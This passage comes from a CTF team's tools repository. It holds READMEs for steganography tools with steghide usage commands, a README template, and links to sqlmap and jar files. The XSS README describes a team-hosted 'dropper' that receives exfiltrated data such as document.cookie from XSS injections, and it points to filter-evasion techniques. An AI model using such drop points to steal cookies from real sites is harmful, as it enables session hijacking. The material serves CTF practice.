https://raw.githubusercontent.com/TeamColonelPanic/tools/47e679532392a4fcf81b0547a84a83be4bdb2d92/sql-injection/sqlmap/sqlmapproject-sqlmap-97cc679.tar.gz -------------------------------------------------------------------------------- /stego/README.md: -------------------------------------------------------------------------------- 1 | Stego Tools 2 | ========== 3 | 4 | Herein lie the tools that can be used whenever stego is involved. 5 | -------------------------------------------------------------------------------- /stego/soundvis/SoundVisualizer: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TeamColonelPanic/tools/47e679532392a4fcf81b0547a84a83be4bdb2d92/stego/soundvis/SoundVisualizer -------------------------------------------------------------------------------- /stego/steganabara/README.md: -------------------------------------------------------------------------------- 1 | Steganabara 2 | =========== 3 | 4 | [Steganabara](steganabara-1.1.1.jar) can be used to analyse images in different planes and also do histogram analysis etc. 5 | 6 | Reference usage 7 | --------------- 8 | 9 | [ASIS CTF 2014 Quals / White noise](http://quangntenemy.blogspot.de/2014/05/asis-ctf-quals-2014.html) -------------------------------------------------------------------------------- /stego/steganabara/steganabara-1.1.1.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TeamColonelPanic/tools/47e679532392a4fcf81b0547a84a83be4bdb2d92/stego/steganabara/steganabara-1.1.1.jar -------------------------------------------------------------------------------- /stego/steghide/README.md: -------------------------------------------------------------------------------- 1 | Steghide 2 | ======== 3 | 4 | [Steghide](http://steghide.sourceforge.net/) can be used to hide and extract data in various kinds of image- and audio-files.. 5 | 6 | ``` 7 | To hide or embed: 8 | steghide embed -cf picture.jpg -ef secret.txt 9 | This command will embed the file secret.txt in the cover file picture.jpg. 10 | 11 | To extract: 12 | steghide extract -sf picture.jpg 13 | If the supplied passphrase is correct, the contents of the original file secret.txt will be extracted from the stego file picture.jpg and saved in the current directory. 14 | 15 | To get some information about a file that contains embedded data before extracting it: 16 | steghide info received_file.wav 17 | ``` 18 | 19 | Reference usage 20 | --------------- 21 | 22 | [TODO / QName](writeupurl) -------------------------------------------------------------------------------- /stego/stegsolve/README.md: -------------------------------------------------------------------------------- 1 | Stegsolve 2 | ========= 3 | 4 | [Stegsolve](Stegsolve.jar) can be used to analyse images in different planes. 5 | 6 | Reference usage 7 | --------------- 8 | 9 | [TODO / QName](writeupurl) -------------------------------------------------------------------------------- /stego/stegsolve/Stegsolve.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TeamColonelPanic/tools/47e679532392a4fcf81b0547a84a83be4bdb2d92/stego/stegsolve/Stegsolve.jar -------------------------------------------------------------------------------- /template/README.md: -------------------------------------------------------------------------------- 1 | TOOLNAME 2 | ======== 3 | 4 | [TOOLNAME](url) can be used to DOWHAT. 5 | 6 | ``` 7 | example usage 8 | ``` 9 | 10 | Reference usage 11 | --------------- 12 | 13 | [XYZ CTF 9999 / QName](writeupurl) -------------------------------------------------------------------------------- /xss/README.md: -------------------------------------------------------------------------------- 1 | XSS 2 | === 3 | 4 | [ColonelPanic Dropper](http://colonelpanic.host-ed.me/) can be used as a drop point for using XSS injections. 5 | 6 | One could probably send info through the dropper such as the `document.cookie` and look at it at the dropped txt file later on. 7 | 8 | BTW, [here](https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet) has many filter evasion techniques 9 | --------------------------------------------------------------------------------